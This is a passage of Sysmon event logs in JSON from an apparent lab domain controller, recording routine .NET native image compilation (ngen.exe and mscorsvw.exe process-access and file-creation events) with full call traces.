T\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7574,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:42.653\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0495-5F25-0000-0010431F0F00}\r\nTargetProcessId: 632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:42.653","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0495-5F25-0000-0010431F0F00}","TargetProcessId":"632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7575,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:42.653\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0495-5F25-0000-0010431F0F00}\r\nTargetProcessId: 632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:42.653","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0495-5F25-0000-0010431F0F00}","TargetProcessId":"632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7576,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:42.731\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04CE-5F25-0000-00102BE01000}\r\nTargetProcessId: 872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:42.731","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04CE-5F25-0000-00102BE01000}","TargetProcessId":"872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7577,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:42.731\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04CE-5F25-0000-00102BE01000}\r\nTargetProcessId: 872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:42.731","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04CE-5F25-0000-00102BE01000}","TargetProcessId":"872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7578,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:42.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04CE-5F25-0000-00102BE01000}\r\nTargetProcessId: 872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:42.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04CE-5F25-0000-00102BE01000}","TargetProcessId":"872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7579,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:43.043\r\nProcessGuid: {A837DB8D-04CE-5F25-0000-00102BE01000}\r\nProcessId: 872\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\368-0\\System.Net.dll\r\nCreationUtcTime: 2020-08-01 05:59:43.043","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:43.043","ProcessGuid":"{A837DB8D-04CE-5F25-0000-00102BE01000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\368-0\\System.Net.dll","CreationUtcTime":"2020-08-01 05:59:43.043","EventReceivedTime":"2020-08-01 05:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7580,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:43.090\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0496-5F25-0000-00109E2B0F00}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:43.090","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0496-5F25-0000-00109E2B0F00}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7581,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:43.090\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0496-5F25-0000-00109E2B0F00}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:43.090","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0496-5F25-0000-00109E2B0F00}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7582,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:43.090\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0496-5F25-0000-00109E2B0F00}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:43.090","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0496-5F25-0000-00109E2B0F00}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
